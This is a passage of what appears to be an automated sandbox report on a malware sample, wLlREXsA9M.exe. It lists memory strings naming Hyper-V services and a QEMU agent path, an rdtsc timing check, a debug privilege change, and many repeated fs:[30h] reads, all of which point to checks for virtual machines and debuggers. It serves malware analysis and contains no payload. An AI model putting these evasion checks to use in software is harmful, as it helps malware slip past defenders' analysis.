Source: wLlREXsA9M.exe, 00000000.00000002.1046996614.0000000010059000.00000004.00000800.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1078387609.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: wLlREXsA9M.exe, 00000000.00000002.1046996614.0000000010059000.00000004.00000800.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1078387609.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: explorer.exe, 00000004.00000002.5864588777.000000000CA35000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA35000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWXE0:3%SystemRoot%\system32\mswsock.dllH;.MSCPRO
Source: wLlREXsA9M.exe, 00000003.00000002.1078387609.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: wLlREXsA9M.exe, 00000000.00000002.1046996614.0000000010059000.00000004.00000800.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1078387609.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: wLlREXsA9M.exe, 00000000.00000002.1046996614.0000000010059000.00000004.00000800.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1078387609.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: wLlREXsA9M.exe, 00000000.00000002.1046996614.0000000010059000.00000004.00000800.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1078387609.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: wLlREXsA9M.exe, 00000003.00000002.1078387609.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: wLlREXsA9M.exe, 00000003.00000003.975376013.00000000025B5000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.974811648.00000000025B5000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1077566633.00000000025B5000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1077566633.0000000002585000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5864588777.000000000CA90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000002.5857150402.000000000932D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.996144169.000000000932D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2623397647.000000000932D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\c_swcomponent.inf_loc
Source: wLlREXsA9M.exe, 00000000.00000002.1032796104.0000000003260000.00000004.00001000.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000000.00000002.1031033084.0000000000770000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1078330404.0000000003E70000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: wLlREXsA9M.exe, 00000000.00000002.1046996614.0000000010059000.00000004.00000800.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1078387609.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: wLlREXsA9M.exe, 00000000.00000002.1046996614.0000000010059000.00000004.00000800.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1078387609.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: wLlREXsA9M.exe, 00000000.00000002.1031033084.000000000078B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: wLlREXsA9M.exe, 00000000.00000002.1046996614.0000000010059000.00000004.00000800.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1078387609.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: wLlREXsA9M.exe, 00000003.00000003.975376013.00000000025B5000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.974811648.00000000025B5000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1077566633.00000000025B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWb
Source: wLlREXsA9M.exe, 00000003.00000002.1078387609.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

0_2_10001A5D

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Code function: 3_2_328D1763 rdtsc

3_2_328D1763

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E289 mov eax, dword ptr fs:[00000030h]	3_2_3290E289
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32897290 mov eax, dword ptr fs:[00000030h]	3_2_32897290
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32897290 mov eax, dword ptr fs:[00000030h]	3_2_32897290
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32897290 mov eax, dword ptr fs:[00000030h]	3_2_32897290
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B42AF mov eax, dword ptr fs:[00000030h]	3_2_328B42AF
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B42AF mov eax, dword ptr fs:[00000030h]	3_2_328B42AF
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328892AF mov eax, dword ptr fs:[00000030h]	3_2_328892AF
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3296B2BC mov eax, dword ptr fs:[00000030h]	3_2_3296B2BC
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3296B2BC mov eax, dword ptr fs:[00000030h]	3_2_3296B2BC
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3296B2BC mov eax, dword ptr fs:[00000030h]	3_2_3296B2BC
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3296B2BC mov eax, dword ptr fs:[00000030h]	3_2_3296B2BC
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288C2B0 mov ecx, dword ptr fs:[00000030h]	3_2_3288C2B0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294F2AE mov eax, dword ptr fs:[00000030h]	3_2_3294F2AE
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C32C0 mov eax, dword ptr fs:[00000030h]	3_2_328C32C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C32C0 mov eax, dword ptr fs:[00000030h]	3_2_328C32C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B32C5 mov eax, dword ptr fs:[00000030h]	3_2_328B32C5
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329632C9 mov eax, dword ptr fs:[00000030h]	3_2_329632C9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288D2EC mov eax, dword ptr fs:[00000030h]	3_2_3288D2EC
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288D2EC mov eax, dword ptr fs:[00000030h]	3_2_3288D2EC
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328872E0 mov eax, dword ptr fs:[00000030h]	3_2_328872E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289A2E0 mov eax, dword ptr fs:[00000030h]	3_2_3289A2E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289A2E0 mov eax, dword ptr fs:[00000030h]	3_2_3289A2E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289A2E0 mov eax, dword ptr fs:[00000030h]	3_2_3289A2E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289A2E0 mov eax, dword ptr fs:[00000030h]	3_2_3289A2E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289A2E0 mov eax, dword ptr fs:[00000030h]	3_2_3289A2E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289A2E0 mov eax, dword ptr fs:[00000030h]	3_2_3289A2E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328982E0 mov eax, dword ptr fs:[00000030h]	3_2_328982E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328982E0 mov eax, dword ptr fs:[00000030h]	3_2_328982E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328982E0 mov eax, dword ptr fs:[00000030h]	3_2_328982E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328982E0 mov eax, dword ptr fs:[00000030h]	3_2_328982E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A02F9 mov eax, dword ptr fs:[00000030h]	3_2_328A02F9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A02F9 mov eax, dword ptr fs:[00000030h]	3_2_328A02F9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A02F9 mov eax, dword ptr fs:[00000030h]	3_2_328A02F9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A02F9 mov eax, dword ptr fs:[00000030h]	3_2_328A02F9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A02F9 mov eax, dword ptr fs:[00000030h]	3_2_328A02F9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A02F9 mov eax, dword ptr fs:[00000030h]	3_2_328A02F9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A02F9 mov eax, dword ptr fs:[00000030h]	3_2_328A02F9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A02F9 mov eax, dword ptr fs:[00000030h]	3_2_328A02F9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291B214 mov eax, dword ptr fs:[00000030h]	3_2_3291B214
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291B214 mov eax, dword ptr fs:[00000030h]	3_2_3291B214
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288A200 mov eax, dword ptr fs:[00000030h]	3_2_3288A200
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288821B mov eax, dword ptr fs:[00000030h]	3_2_3288821B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CA22B mov eax, dword ptr fs:[00000030h]	3_2_328CA22B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CA22B mov eax, dword ptr fs:[00000030h]	3_2_328CA22B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CA22B mov eax, dword ptr fs:[00000030h]	3_2_328CA22B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32910227 mov eax, dword ptr fs:[00000030h]	3_2_32910227
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32910227 mov eax, dword ptr fs:[00000030h]	3_2_32910227
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32910227 mov eax, dword ptr fs:[00000030h]	3_2_32910227
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B0230 mov ecx, dword ptr fs:[00000030h]	3_2_328B0230
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290D250 mov eax, dword ptr fs:[00000030h]	3_2_3290D250
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290D250 mov ecx, dword ptr fs:[00000030h]	3_2_3290D250
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BF24A mov eax, dword ptr fs:[00000030h]	3_2_328BF24A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294F247 mov eax, dword ptr fs:[00000030h]	3_2_3294F247
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295124C mov eax, dword ptr fs:[00000030h]	3_2_3295124C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295124C mov eax, dword ptr fs:[00000030h]	3_2_3295124C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295124C mov eax, dword ptr fs:[00000030h]	3_2_3295124C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295124C mov eax, dword ptr fs:[00000030h]	3_2_3295124C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294D270 mov eax, dword ptr fs:[00000030h]	3_2_3294D270
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288B273 mov eax, dword ptr fs:[00000030h]	3_2_3288B273
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288B273 mov eax, dword ptr fs:[00000030h]	3_2_3288B273
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288B273 mov eax, dword ptr fs:[00000030h]	3_2_3288B273
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32891380 mov eax, dword ptr fs:[00000030h]	3_2_32891380
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32891380 mov eax, dword ptr fs:[00000030h]	3_2_32891380
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32891380 mov eax, dword ptr fs:[00000030h]	3_2_32891380
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32891380 mov eax, dword ptr fs:[00000030h]	3_2_32891380
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32891380 mov eax, dword ptr fs:[00000030h]	3_2_32891380
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AF380 mov eax, dword ptr fs:[00000030h]	3_2_328AF380
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AF380 mov eax, dword ptr fs:[00000030h]	3_2_328AF380
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AF380 mov eax, dword ptr fs:[00000030h]	3_2_328AF380
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AF380 mov eax, dword ptr fs:[00000030h]	3_2_328AF380
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AF380 mov eax, dword ptr fs:[00000030h]	3_2_328AF380
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AF380 mov eax, dword ptr fs:[00000030h]	3_2_328AF380
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294F38A mov eax, dword ptr fs:[00000030h]	3_2_3294F38A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290C3B0 mov eax, dword ptr fs:[00000030h]	3_2_3290C3B0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328993A6 mov eax, dword ptr fs:[00000030h]	3_2_328993A6
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328993A6 mov eax, dword ptr fs:[00000030h]	3_2_328993A6
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328963CB mov eax, dword ptr fs:[00000030h]	3_2_328963CB
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329143D5 mov eax, dword ptr fs:[00000030h]	3_2_329143D5
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288E3C0 mov eax, dword ptr fs:[00000030h]	3_2_3288E3C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288E3C0 mov eax, dword ptr fs:[00000030h]	3_2_3288E3C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288E3C0 mov eax, dword ptr fs:[00000030h]	3_2_3288E3C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288C3C7 mov eax, dword ptr fs:[00000030h]	3_2_3288C3C7
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C33D0 mov eax, dword ptr fs:[00000030h]	3_2_328C33D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C43D0 mov ecx, dword ptr fs:[00000030h]	3_2_328C43D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32889303 mov eax, dword ptr fs:[00000030h]	3_2_32889303
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32889303 mov eax, dword ptr fs:[00000030h]	3_2_32889303
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C631F mov eax, dword ptr fs:[00000030h]	3_2_328C631F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AE310 mov eax, dword ptr fs:[00000030h]	3_2_328AE310
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AE310 mov eax, dword ptr fs:[00000030h]	3_2_328AE310
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AE310 mov eax, dword ptr fs:[00000030h]	3_2_328AE310
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294F30A mov eax, dword ptr fs:[00000030h]	3_2_3294F30A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288E328 mov eax, dword ptr fs:[00000030h]	3_2_3288E328
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288E328 mov eax, dword ptr fs:[00000030h]	3_2_3288E328
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288E328 mov eax, dword ptr fs:[00000030h]	3_2_3288E328
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32963336 mov eax, dword ptr fs:[00000030h]	3_2_32963336
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B332D mov eax, dword ptr fs:[00000030h]	3_2_328B332D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C8322 mov eax, dword ptr fs:[00000030h]	3_2_328C8322
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C8322 mov eax, dword ptr fs:[00000030h]	3_2_328C8322
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C8322 mov eax, dword ptr fs:[00000030h]	3_2_328C8322
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32888347 mov eax, dword ptr fs:[00000030h]	3_2_32888347
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32888347 mov eax, dword ptr fs:[00000030h]	3_2_32888347
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32888347 mov eax, dword ptr fs:[00000030h]	3_2_32888347
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CA350 mov eax, dword ptr fs:[00000030h]	3_2_328CA350
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32910371 mov eax, dword ptr fs:[00000030h]	3_2_32910371
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32910371 mov eax, dword ptr fs:[00000030h]	3_2_32910371
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E372 mov eax, dword ptr fs:[00000030h]	3_2_3290E372
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E372 mov eax, dword ptr fs:[00000030h]	3_2_3290E372
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E372 mov eax, dword ptr fs:[00000030h]	3_2_3290E372
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E372 mov eax, dword ptr fs:[00000030h]	3_2_3290E372
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289B360 mov eax, dword ptr fs:[00000030h]	3_2_3289B360
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289B360 mov eax, dword ptr fs:[00000030h]	3_2_3289B360
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289B360 mov eax, dword ptr fs:[00000030h]	3_2_3289B360
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289B360 mov eax, dword ptr fs:[00000030h]	3_2_3289B360
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289B360 mov eax, dword ptr fs:[00000030h]	3_2_3289B360
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289B360 mov eax, dword ptr fs:[00000030h]	3_2_3289B360
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE363 mov eax, dword ptr fs:[00000030h]	3_2_328CE363
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE363 mov eax, dword ptr fs:[00000030h]	3_2_328CE363
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE363 mov eax, dword ptr fs:[00000030h]	3_2_328CE363
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE363 mov eax, dword ptr fs:[00000030h]	3_2_328CE363
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE363 mov eax, dword ptr fs:[00000030h]	3_2_328CE363
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE363 mov eax, dword ptr fs:[00000030h]	3_2_328CE363
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE363 mov eax, dword ptr fs:[00000030h]	3_2_328CE363
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE363 mov eax, dword ptr fs:[00000030h]	3_2_328CE363
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B237A mov eax, dword ptr fs:[00000030h]	3_2_328B237A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32964080 mov eax, dword ptr fs:[00000030h]	3_2_32964080
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32964080 mov eax, dword ptr fs:[00000030h]	3_2_32964080
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32964080 mov eax, dword ptr fs:[00000030h]	3_2_32964080
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32964080 mov eax, dword ptr fs:[00000030h]	3_2_32964080
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32964080 mov eax, dword ptr fs:[00000030h]	3_2_32964080
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32964080 mov eax, dword ptr fs:[00000030h]	3_2_32964080
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32964080 mov eax, dword ptr fs:[00000030h]	3_2_32964080
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288C090 mov eax, dword ptr fs:[00000030h]	3_2_3288C090
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288A093 mov ecx, dword ptr fs:[00000030h]	3_2_3288A093
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329650B7 mov eax, dword ptr fs:[00000030h]	3_2_329650B7
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D00A5 mov eax, dword ptr fs:[00000030h]	3_2_328D00A5
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3293F0A5 mov eax, dword ptr fs:[00000030h]	3_2_3293F0A5
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3293F0A5 mov eax, dword ptr fs:[00000030h]	3_2_3293F0A5
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3293F0A5 mov eax, dword ptr fs:[00000030h]	3_2_3293F0A5
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3293F0A5 mov eax, dword ptr fs:[00000030h]	3_2_3293F0A5
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3293F0A5 mov eax, dword ptr fs:[00000030h]	3_2_3293F0A5
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3293F0A5 mov eax, dword ptr fs:[00000030h]	3_2_3293F0A5
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3293F0A5 mov eax, dword ptr fs:[00000030h]	3_2_3293F0A5
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294B0AF mov eax, dword ptr fs:[00000030h]	3_2_3294B0AF
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AB0D0 mov eax, dword ptr fs:[00000030h]	3_2_328AB0D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288B0D6 mov eax, dword ptr fs:[00000030h]	3_2_3288B0D6
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288B0D6 mov eax, dword ptr fs:[00000030h]	3_2_3288B0D6
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288B0D6 mov eax, dword ptr fs:[00000030h]	3_2_3288B0D6
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288B0D6 mov eax, dword ptr fs:[00000030h]	3_2_3288B0D6
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328890F8 mov eax, dword ptr fs:[00000030h]	3_2_328890F8
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328890F8 mov eax, dword ptr fs:[00000030h]	3_2_328890F8
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328890F8 mov eax, dword ptr fs:[00000030h]	3_2_328890F8
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328890F8 mov eax, dword ptr fs:[00000030h]	3_2_328890F8
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CD0F0 mov eax, dword ptr fs:[00000030h]	3_2_328CD0F0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CD0F0 mov ecx, dword ptr fs:[00000030h]	3_2_328CD0F0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288C0F6 mov eax, dword ptr fs:[00000030h]	3_2_3288C0F6
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32898009 mov eax, dword ptr fs:[00000030h]	3_2_32898009
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B5004 mov eax, dword ptr fs:[00000030h]	3_2_328B5004
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B5004 mov ecx, dword ptr fs:[00000030h]	3_2_328B5004
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2010 mov ecx, dword ptr fs:[00000030h]	3_2_328D2010
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288D02D mov eax, dword ptr fs:[00000030h]	3_2_3288D02D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C0044 mov eax, dword ptr fs:[00000030h]	3_2_328C0044
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3296505B mov eax, dword ptr fs:[00000030h]	3_2_3296505B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32891051 mov eax, dword ptr fs:[00000030h]	3_2_32891051
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32891051 mov eax, dword ptr fs:[00000030h]	3_2_32891051
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32897072 mov eax, dword ptr fs:[00000030h]	3_2_32897072
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32896074 mov eax, dword ptr fs:[00000030h]	3_2_32896074
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32896074 mov eax, dword ptr fs:[00000030h]	3_2_32896074
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32894180 mov eax, dword ptr fs:[00000030h]	3_2_32894180
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32894180 mov eax, dword ptr fs:[00000030h]	3_2_32894180
